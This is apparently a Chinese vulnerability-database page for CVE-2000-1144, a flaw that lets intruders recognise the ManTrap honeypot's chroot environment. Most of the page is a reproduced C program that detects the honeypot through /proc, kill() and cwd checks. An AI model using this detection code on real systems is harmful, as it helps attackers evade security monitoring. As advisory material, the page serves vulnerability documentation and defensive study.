Recourse ManTrap掩盖运行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106067 漏洞类型 未知
发布时间 2000-11-01 更新时间 2005-10-12
CVE编号 CVE-2000-1144 CNNVD-ID CNNVD-200101-052
漏洞平台 Unix CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/20381
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200101-052
|漏洞详情
RecourseManTrap1.6版本建立一个chroot环境掩盖它正在运行的事实,但由此产生的“/”文件系统中的inode数目较正常高,攻击者利用该漏洞确定它们在chroot环境中。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/1909/info

ManTrap is a "honeypot" intrusion detection system designed to lure attackers into it for analysis. The honeypot is implemented as a chroot'ed Solaris environment, designed to look and feel real to an attacker who gains access to it. 

Chroot (change root) is a unix mechanism that allows an administrator to force a process/process group to run under a subset of the file system, denying access to any other parts of the file system. It is possible for an attacker to guess that they are on a chrooted() ManTrap system by looking at the inode of the root directory (ls -id /). If it is high (usually within the 100000-200000 range), then the root directory is a chrooted() subset of a larger filesystem. 

This vulnerability, combined with hidden process disclosure (bugtraq ID 1908) should fairly accurately verify to an attaacker (without root privs) that the host is a ManTrap honeypot, defeating its purpose.
*/


/*
 *  ManTrap detection/testing program by wilson / f8labs - www.f8labs.org
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <dirent.h>

void check_proc_vs_kill(int listpids)
{ 
  struct stat st;
  int i, counter;
  char buf[520];
  
  printf("proc-vs-kill() test: \n");
  fflush(0);
  
  if (geteuid() == 0)
  {
    printf("  Error: Running as root. NOT performing /proc-vs-kill() test.\n");
    return;
  }

  if (listpids == 1)
  {
    printf("Listing mismatching PIDs:\n");
  }

  counter = 0;
  for (i = 1; i < 65535; i ++)
  {
    if ((kill(i, SIGCONT) != 0) && (errno == EPERM)) /* send SIGCONT (which hopefully won't matter) to the process */
    {
      snprintf(buf, 511, "/proc/%d", i);
      if (stat(buf, &st) != 0)
      {
        counter ++;
        if (listpids == 1)
        {
          printf("%.5d ", i);
          if (counter%8 == 0)
          {
            printf("\n");
          } 
        }
      }
    }
  }
  if (listpids == 1)
  {
    printf("\n");
  }
  if (counter == 0)
  {
    printf("  Normal: No mismatches found.\n");
  } else
  {
    printf("  ManTrap? %d mismatching PIDs found.\n", counter);
  }
}

void check_proc_dotdot()
{
  DIR *procDIR;
  struct dirent *procdirent;
  int found;
  
  printf("dotdot test:\n");
  procDIR = opendir("/proc");
  if (procDIR == NULL)
  {
    printf("  Error: Couldn't open /proc while performing dotdot test.\n");
    return;
  }
  found = 0;
  procdirent = readdir(procDIR);
  while (procdirent != NULL)
  {
    if (strcmp(procdirent->d_name, "..") == 0)
    {
      found = 1;
      break;
    }
    procdirent = readdir(procDIR);
  }
  closedir(procDIR);
  if (found == 0)
  {
    printf("  ManTrap? /proc/.. not found in directory listing!\n");
  } else {
    printf("  Normal: /proc/.. found in directory listing.\n");
  }

}

void check_proc_cwdwalk()
{
  char savedpwd[2048], newpwd[2048];
  
  printf("cwdwalk test:\n");
  if (getwd(savedpwd) == NULL)
  {
    printf("  Error: Couldn't get working directory while performing cwdwalk test.\n");
    return;
  }
  
  if (chdir("/proc/self") != 0)
  {
    printf("  Error: Couldn't chdir to /proc/self while performing cwdwalk test.\n");
    return;
  }
  if (chdir("cwd") != 0)
  {
    printf(" Error: Couldn't chdir to /proc/self/cwd while performing cwdwalk test.\n");
    return;
  }
  if (getwd(newpwd) == NULL)
  {
    printf("  ManTrap? getwd() failed after chdir to /proc/self/cwd.\n");
  } else {
    printf("  Normal: getwd() succeeded after chdir to /proc/self/cwd.\n");
  }
  chdir(savedpwd);
  return;
}

void usage(char *myname)
{
  printf("Usage: %s <-a|-p|-l|-d|-c|-h>\n", myname);
  printf(" -a performs ALL tests\n");
  printf(" -p performs /proc-vs-kill() test\n");
  printf(" -l performs /proc-vs-kill() test and lists mismatching PIDs\n");
  printf(" -d performs /proc/.. test\n");
  printf(" -c performs /proc/self/cwd test\n");
  printf(" -h shows this help\n");
}

int main(int argc, char *argv[])
{
  printf("ManTrap detection/testing program by wilson@f8labs.org - www.f8labs.org\n");
  if (argc != 2)
  {
    usage(argv[0]);
    exit(1);
  }
  if (strlen(argv[1]) != 2)
  {
    usage(argv[0]);
    exit(1);
  }
  switch(argv[1][1])
  {
    case 'a':
      check_proc_vs_kill(0);
      check_proc_dotdot();
      check_proc_cwdwalk();
      break;
    case 'p':
      check_proc_vs_kill(0);
      break;
    case 'l':
      check_proc_vs_kill(1);
      break;
    case 'd':
      check_proc_dotdot();
      break;
    case 'c':
      check_proc_cwdwalk();
      break;
    case 'h':
    default:
      usage(argv[0]);
      exit(1);
      break;    
  }
  printf("Finished.\n");
}
|参考资料

来源:BID
名称:1909
链接:http://www.securityfocus.com/bid/1909
来源:BUGTRAQ
名称:20001107VendorResponseRe:MantrapAdvisoryVendorFollowup-FateResearchLabs
链接:http://archives.neohapsis.com/archives/bugtraq/2000-11/0100.html
来源:XF
名称:mantrap-inode-disclosure
链接:http://xforce.iss.net/static/5472.php
来源:BUGTRAQ
名称:20001105MantrapAdvisoryVendorFollowup-FateResearchLabs
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=97349791405580&w=2
来源:BUGTRAQ
名称:20001102MantrapByRecourseTechnologies-FateAdvisory(11-01-00)
链接:http://archives.neohapsis.com/archives/bugtraq/2000-11/0041.html